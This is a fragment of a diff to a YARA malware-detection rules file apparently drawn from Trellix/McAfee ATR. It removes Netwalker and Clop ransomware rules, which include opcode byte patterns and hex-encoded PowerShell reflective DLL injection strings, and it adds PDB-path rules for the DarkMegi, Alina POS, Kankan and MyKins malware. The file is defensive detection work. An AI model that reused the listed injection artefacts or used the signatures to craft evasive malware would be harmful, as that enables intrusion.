??????6B????BA????????D1??8B??????33??????C1????B9????????6B????B9????????D1??8B??????33??????C1????0B??B9????????6B????89??????B8????????6B????BA????????6B????8B??????03??????BA????????6B????89??????B9????????6B????B8????????6B????8B??????33??????C1????B8????????6B????B8????????6B????8B??????33??????C1????0B??B8????????6B????89??????BA????????D1??B8????????6B????8B??????03??????B8????????D1??89??????B9????????6B????B8????????D1??8B??????33??????C1????BA????????6B????BA????????D1??8B??????33??????C1????0B??BA????????6B????89??????B9????????6B????B8????????6B????8B??????03??????B8????????6B????89??????BA????????6B????B9????????6B????8B??????33??????C1????B9????????6B????B9????????6B????8B??????33??????C1????0B??B9????????6B????89??????B8????????6B????BA????????6B????8B??????03??????BA????????6B????89??????B9????????6B????B8????????6B????8B??????33??????C1????B8????????6B????B8????????6B????8B??????33??????C1????0B??B8????????6B????89??????BA????????6B???? }
-		$pattern2 = { CCCCCCCCCCA1????????C3CCCCCCCCCCCCCCCCCCCC538B??????5533??5785??74??8B??????85??74??8B????85??74??C1????50E8????????83????89??85??74??8B????5633??85??74??5653E8????????83????85??74??8B????85??74??8D??????89??????5150E8????????83????85??74??8B????8B??8B??????89????FF????8B????463B??72??39????B9????????5E0F44??5F8B??5D5BC35F5D33??5BC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC535556578B??????85??74??83????74??8B????85??74??8B??????85??74??33??85??74??8B??????660F1F??????85??74??8B??53FF????E8????????EB??E8????????8D????8B??FF????8B??53FF??83????85??75??463B????72??5F5E5D33??5BC35F5E5DB8????????5BC3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC6A??FF??????FF??????E8????????83????C3CCCCCCCCCCCCCCCCCCCCCCCCCC6A??FF??????FF??????E8????????83????C3CCCCCCCCCCCCCCCCCCCCCCCCCC83????????????5674??8B??????85??74??56E8????????8B????50E8????????83????85??75??A1????????6A??83????5650E8????????83????85??75??56E8????????83????85??74??8D????66??????74??83????83????75??33??5EC383????74??A1????????6A??83????5150E8????????83????85??74??B8????????5EC3CCCCCCCCCCCCCCCCCCCC83????????????74??8B??????85??74??A1????????6A??83????5150E8????????83????85??74??B8????????C333??C3CCCCCCCCCCCCCCCCCCCCCCCCCCCC83????????????5674??A1????????83??????74??8B??????85??74??56E8????????8B??????????83????83????75??83??????74??66????????75??0FB7??83????72??83????76??83????66??????76??6A??8D????5650E8????????83????85??74??B8????????5EC333??5EC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC83????????????74??A1????????83????????????74??8B??????85??74??6A??05????????5150E8????????83????85??74??B8????????C333??C3CCCCCC83????????????74??A1????????83????????????74??8B??????85??74??6A??05????????5150E8????????83????85??74??B8????????C333??C3CCCCCC83????????????74??8B??????85??74??A1????????83??????74??6A??83????5150E8????????83????85??74??B8????????C333??C3CCCCCCCCCCCCCCCC83????????????74??8B??????85??74??A1????????83??????74??6A??83????5150E8????????83????85??74??B8????????C333??C3CCCCCCCCCCCCCCCC83????????????5674??8B??????85??74??A1????????83??????74??51E8????????8B??83????85??74??8B??????????6A??83????5651E8????????83????85??74??B8????????5EC356E8????????83????33??5EC3CCCCCCCCCCCCCC535556576A??E8????????8B??83????85??0F84????????8B??660F1F??????0FB7????83????51E8????????8B??83????85??74??0FB7????51FF????57E8????????83????83????????????74??A1????????83??????74??6A??83????5750E8????????83????85??74??E8????????8B????3B????74??6A??51E8????????8B??83????85??74??E8????????6A??538B????FF??E8????????538B??????????FF??57E8????????83????8B??03??85??0F85????????55E8????????83????E8????????6A??8B??????????FF??E9????????CCCCCCCCCCCCCC83????5533??565739??????????0F84????????8B??????85??0F84????????8B??????85??0F84????????53E8????????8B??????????FF??83??????8B??74??E8????????FF????8B??????????FF??89??????E8????????8D??????516A??8B??????????8D??????516A??57FF??85??74??8B??????89????83????74??E8????????8B??????????FF??2B??3D????????77??83??????75??5B5F5E8B??5D83????C3BD????????5B5F5E8B??5D83????C35F5E33??5D83????C383????558B??????85??0F84????????5333??5733??89??????89??????E8????????8D??????518D??????8B??????????5157576A??FF????FF??85??0F85????????E8????????8B??????????FF??3D????????0F85????????FF??????E8????????83????89??????85??0F84????????56E8????????8D??????518D??????8B??????????51FF??????FF??????6A??FF????FF??85??74??33??39??????76??8B??????0F1F??????????E8????????8B??????68????????FF????8B??????????FF??FF??89??????8D????????????5053E8????????8B??83????85??74??FF??????68????????E8????????83????89????474683????3B??????72??8B??????FF??????E8????????83????85??74??85??74??E8????????6A??6A??538B??????????57FF??33??85??74??E8????????FF????8B??????????FF??463B??72??53E8????????83????5EE8????????8D??????516A??FF????8B??????????FF??5F5B85??74??8D??????50FF????E8????????83????E8????????FF????8B??????????FF??55E8????????83????33??5D83????C2????CCCCCCCCCCCCCCCCCCCCCCCC83????568B??????85??74??E8????????8D??????516A??8B??????????56FF??85??74??8D??????5056E8????????83????E8????????568B??????????FF??33??5E83????C2????CCCCCCCCCCCC83????83????????????5356570F84????????A1????????83??????0F84????????55E8????????68????????6A??6A??8B??????????FF??8B??89??????85??0F84????????660F1F????????????C7??????????????C7??????????????C7??????????????E8????????8D??????518D??????8B??????????518D??????516A??6A??6A??6A??55FF??85??0F85????????E8????????8B??????????FF??3D????????0F85????????FF??????E8????????83????89??????85??0F84????????E8????????8B??????8D??????518D??????8B??????????518D??????51FF??????566A??6A??55FF??85??0F84????????33??33??89??????39??????0F86????????0F1F??????????FF??E8????????83????85??75??FF????E8????????83????85??74??E8????????68????????FF??8B??????????55FF??89??????85??74??6A??E8????????8B??83????85??74??8B??????8D????????????5189????8B??????5389????E8????????8B??83????85??74??5568????????E8????????83????89????478B??????8B??????83????4089??????3B??????0F82????????85??74??85??74??E8????????6A??6A??538B??????????57FF??33??85??74??0F1F????E8????????FF????8B??????????FF??463B??72??53E8????????83????FF??????E8????????83????E8????????68????????8B??????????FF??E9????????5D5F5E33??5B83????C2????CCCCCC83????53558B??????565785??0F84????????8B????8D??????516A??55C7??????????????FF????85??0F88????????8B??????8D??????C7??????????????52508B??FF????85??0F88????????6A??8D??????6A??50E8????????33??83????B8????????66????????39??????0F8E????????8B??????8D??????5083????C7??????????????438B??89??????0F10??????8B??510F11??FF????85??0F88????????8B??????8D??????C7??????????????52508B??FF????85??0F88????????8B??????8D??????C7??????????????33??52508B??FF????83????????0F84????????FF??????E8????????83????85??0F85????????8B??????8D??????89??????52508B??FF????85??0F88????????8B??????8D??????89??????52508B??FF????85??0F88????????8B??????8D??????89??????52508B??FF????85??0F88????????33?? }
-		$pattern3 = { CCCCCCCCCC558B??FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF?????????? }
+		$pdb = "\\eclipse\\botnet\\drivers\\Bin\\i386\\kernel.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and any of ( $pattern* )
+		uint16( 0 ) == 0x5a4d and filesize < 80KB and any of them
 }
-
-rule TRELLIX_ARC_Netwalker_Signed : FILE
+rule TRELLIX_ARC_Downloader_Darkmegi_Pdb : DOWNLOADER FILE
 {
 	meta:
-		description = "Rule to detect Netwalker ransomware digitally signed."
+		description = "Rule to detect DarkMegi downloader based on PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "6806b917-2e02-57e3-887a-b4c12db83653"
-		date = "2020-03-30"
-		modified = "2020-11-20"
-		reference = "https://www.ccn-cert.cni.es/comunicacion-eventos/comunicados-ccn-cert/9802-publicado-un-informe-de-codigo-danino-sobre-netwalker.html"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_netwalker.yar#L30-L47"
+		id = "3ccc3685-e05b-5620-9198-24733fb1e7eb"
+		date = "2013-03-06"
+		modified = "2020-08-14"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_downloader_darkmegi.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "d78ed22771d7c93516375afb8fd2fd7baa40a357ec3c247939a10d11f80ae226"
+		hash = "bf849b1e8f170142176d2a3b4f0f34b40c16d0870833569824809b5c65b99fc1"
+		logic_hash = "47faf8c5296e651f82726a6e8a7843dfa0f98e7be7257d2c03efcff550f52140"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		note = "The rule will hit also some Dridex samples digitally signed"
+		tags = "DOWNLOADER, FILE"
+		rule_version = "v1"
+		malware_type = "downloader"
+		malware_family = "Downloader:W32/DarkMegi"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
+
+	strings:
+		$pdb = "\\RKTDOW~1\\RKTDRI~1\\RKTDRI~1\\objchk\\i386\\RktDriver.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "/CN=EWBTCAXQKUMDTHCXCZ" and pe.signatures [ i ] . serial == "17:16:bb:93:fb:a9:a2:41:ba:a8:2e:c7:5e:ff:0c" or pe.signatures [ i ] . thumbprint == "a4:28:e9:4a:61:3a:1f:cf:ff:08:bf:e7:61:51:64:31:1a:6f:87:bc" )
+		uint16( 0 ) == 0x5a4d and filesize > 20000KB and any of them
 }
-rule TRELLIX_ARC_Netwalker : RANSOMWARE FILE
+rule TRELLIX_ARC_Alina_POS_PDB : POS FILE
 {
 	meta:
-		description = "Rule based on code overlap in RagnarLocker ransomware"
-		author = "McAfee ATR team"
-		id = "80097a40-534a-5e1b-8fde-e4d832d76698"
-		date = "2020-06-14"
-		modified = "2020-11-20"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_netwalker.yar#L49-L75"
+		description = "Rule to detect Alina POS"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "9588aa10-d5e4-55f4-998c-a01503a53d3a"
+		date = "2013-08-08"
+		modified = "2020-08-14"
+		reference = "https://www.pandasecurity.com/mediacenter/pandalabs/alina-pos-malware/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_alina_pos_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "8c56ebed9e097d294045de46942c708da9ba7e01475dcecb0c3d41fcc8004780"
+		hash = "28b0c52c0630c15adcc857d0957b3b8002a4aeda3c7ec40049014ce33c7f67c3"
+		logic_hash = "9bb8260e3a47567e2460dd474fb74e57987e3d79eb30cdbc2a45b88a16ba1ca2"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "POS, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
+		malware_type = "pos"
+		malware_family = "Pos:W32/Alina"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$0 = {C88BF28B4330F76F3803C88B434813F2F76F2003C88B433813F2F76F3003C88B434013F2F76F2803C88B432813F2F76F4003C8894D6813F289756C8B4338F76F388BC88BF28B4328F76F4803C88B434813F2F76F2803C88B433013F2F76F400FA4CE}
-		$1 = {89542414895424108BEA8BDA8BFA423C22747C3C5C75588A023C5C744F3C2F744B3C2274473C6275078D5702B008EB3F3C6675078D5302B00CEB343C6E75078D5502B00AEB293C72750B8B542410B00D83C202EB1A3C74750B8B542414B00983C2}
-		$2 = {C8894D7013F28975748B4338F76F408BC88BF28B4340F76F3803C88B433013F2F76F4803C88B434813F2F76F3003C8894D7813F289757C8B4348F76F388BC88BF28B4338F76F4803C88B434013F2F76F400FA4CE}
-		$3 = {C07439473C2F75E380FB2A74DEEB2D8D4ABF8D422080F9190FB6D80FB6C28AD60F47D88AC6042080EA410FB6C880FA190FB6C60F47C83ACB754B46478A1684D2}
-		$4 = {8B433013F2F76F0803C88B432013F2F76F1803C88B0313F2F76F3803C88B430813F2F76F3003C88B433813F2F72F03C8894D3813F289753C8B4338F76F088BC8}
-		$5 = {F73101320E32213234329832E3320C332D334733643383339133A833BD33053463347C34543564358335AE36C3362937E9379A39BA390A3A203A443A183B2B3B}
-		$6 = {8B431813F2F76F4803C88B432813F2F76F3803C88B434013F2F76F200FA4CE0103C903C88B432013F2F76F4003C88B433013F2F76F3003C8894D6013F2897564}
+		$pdb = "\\Users\\dice\\Desktop\\SRC_adobe\\src\\grab\\Release\\Alina.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and any of them
 }
-rule TRELLIX_ARC_Win_Netwalker_Reflective_Dll_Injection_Decoded : RANSOMWARE
+rule TRELLIX_ARC_Backdoor_Kankan_Pdb : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect Reflective DLL Injection Powershell Script dropping Netwalker, after hexadecimal decoded and xor decrypted "
-		author = "McAfee ATR Team"
-		id = "9562c0b9-e7ac-5b96-99cc-1df91cb617af"
-		date = "2020-05-28"
-		modified = "2020-11-20"
-		reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/ | https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_netwalker.yar#L77-L140"
+		description = "Rule to detect kankan PDB"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "6910ecc7-3c31-569b-a7ff-2dcbccff88f9"
+		date = "2013-08-01"
+		modified = "2020-08-14"
+		reference = "https://threatpoint.checkpoint.com/ThreatPortal/threat?threatType=malwarefamily&threatId=650"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_backdoor_kankan_pdb.yar#L1-L27"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "fd29001b8b635e6c51270788bab7af0bb5adba6917c278b93161cfc2bc7bd6ae"
-		logic_hash = "e99c045f39e7933e877a4df7793aa5ea6be5a782bb079419501929ba99844dec"
+		hash = "73f9e28d2616ee990762ab8e0a280d513f499a5ab2cae9f8cf467701f810b98a"
+		logic_hash = "3d2e45631dfca0e76e98eee4bb5c4ce1631906f497c052d8c41cc37637cb2760"
 		score = 75
-		quality = 30
-		tags = "RANSOMWARE"
+		quality = 70
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Kankan"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$api0 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 20 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 41 6c 6c 6f 63 22 29 5d }
-		$api1 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 22 29 5d }
-		$api2 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 4c 6f 61 64 4c 69 62 72 61 72 79 41 22 29 5d }
-		$api3 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 57 72 69 74 65 50 72 6f 63 65 73 73 4d 65 6d 6f 72 79 22 29 5d }
-		$api4 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 46 72 65 65 22 29 5d }
-		$api5 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 22 29 5d }
-		$api6 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 43 6c 6f 73 65 48 61 6e 64 6c 65 22 29 5d }
-		$api7 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 20 53 65 74 4c 61 73 74 45 72 72 6f 72 3d 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 41 6c 6c 6f 63 45 78 22 29 5d }
-		$api8 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 20 53 65 74 4c 61 73 74 45 72 72 6f 72 3d 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 50 72 6f 74 65 63 74 45 78 22 29 5d }
-		$api9 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 20 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 4f 70 65 6e 50 72 6f 63 65 73 73 22 29 5d }
-		$api10 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 43 72 65 61 74 65 52 65 6d 6f 74 65 54 68 72 65 61 64 22 29 5d }
-		$artifact0 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 43 72 65 61 74 65 52 65 6d 6f 74 65 54 68 72 65 61 64 22 29 5d }
-		$artifact1 = { 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 50 74 72 54 6f 53 74 72 75 63 74 75 72 65 }
-		$artifact2 = { 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 52 65 61 64 49 6e 74 31 36 }
-		$artifact3 = { 65 6e 76 3a 57 49 4e 44 49 52 5c 73 79 73 77 6f 77 36 34 5c 77 69 6e 64 6f 77 73 70 6f 77 65 72 73 68 65 6c 6c 5c 76 31 2e 30 5c 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 22 20 2d 4e 6f 6e 49 6e 74 65 72 61 63 74 69 76 65 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 65 78 65 63 20 62 79 70 61 73 73}
-		$artifact4 = { 65 6e 76 3a 57 49 4e 44 49 52 5c 73 79 73 77 6f 77 36 34 5c 77 69 6e 64 6f 77 73 70 6f 77 65 72 73 68 65 6c 6c 5c 76 31 2e 30 5c 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 22 20 2d 4e 6f 6e 49 6e 74 65 72 61 63 74 69 76 65 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 65 78 65 63 20 62 79 70 61 73 73 20 2d 66 69 6c 65}
-		$artifact5 = {5b 50 61 72 61 6d 65 74 65 72 28 50 6f 73 69 74 69 6f 6e 20 3d 20 30 20 2c 20 4d 61 6e 64 61 74 6f 72 79}
-		$artifact6 = {5b 50 61 72 61 6d 65 74 65 72 28 50 6f 73 69 74 69 6f 6e 20 3d 20 31 20 2c 20 4d 61 6e 64 61 74 6f 72 79}
-		$artifact7 = {2d 45 78 65 63 75 74 69 6f 6e 50 6f 6c 69 63 79 20 42 79 50 61 73 73 20 2d 4e 6f 4c 6f 67 6f 20 2d 4e 6f 6e 49 6e 74 65 72 61 63 74 69 76 65 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 4e 6f 45 78 69 74}
-		$artifact8 = {72 65 74 75 72 6e 20 5b 42 69 74 43 6f 6e 76 65 72 74 65 72 5d 3a 3a 54 6f 49 6e 74 36 34}
+		$pdb = "\\Projects\\OfficeAddin\\INPEnhSvc\\Release\\INPEnhSvc.pdb"
+		$pdb1 = "\\Projects\\OfficeAddin\\OfficeAddin\\Release\\INPEn.pdb"
+		$pdb2 = "\\Projects\\OfficeAddinXJ\\VOCEnhUD\\Release\\VOCEnhUD.pdb"
 
 	condition:
-		6 of ( $api* ) or ( ( 3 of ( $artifact* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and any of them
 }
-rule TRELLIX_ARC_Clop_Ransom_Note : RANSOMWARE FILE
+rule TRELLIX_ARC_Shellcode_Mykins_Botnet : SHELLCODE FILE
 {
 	meta:
-		description = "Rule to detect Clop Ransomware Note"
+		description = "Rule to detect the shellcode used in the MyKins Botnet"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "b18e4d4d-aa38-5009-a31b-ed038c5bd4f9"
-		date = "2019-08-01"
+		id = "9dc80b27-59e2-5925-9bb7-64a54241f52b"
+		date = "2018-01-24"
 		modified = "2020-08-14"
-		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clop-ransomware/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_ClopRansomNote.yar#L1-L34"
+		reference = "https://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_shellcode_mykins_botnet.yar#L1-L27"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "a90862e9dc59b1a8f38b777b4f529d5de740d0f49175813cae64f10ca9677826"
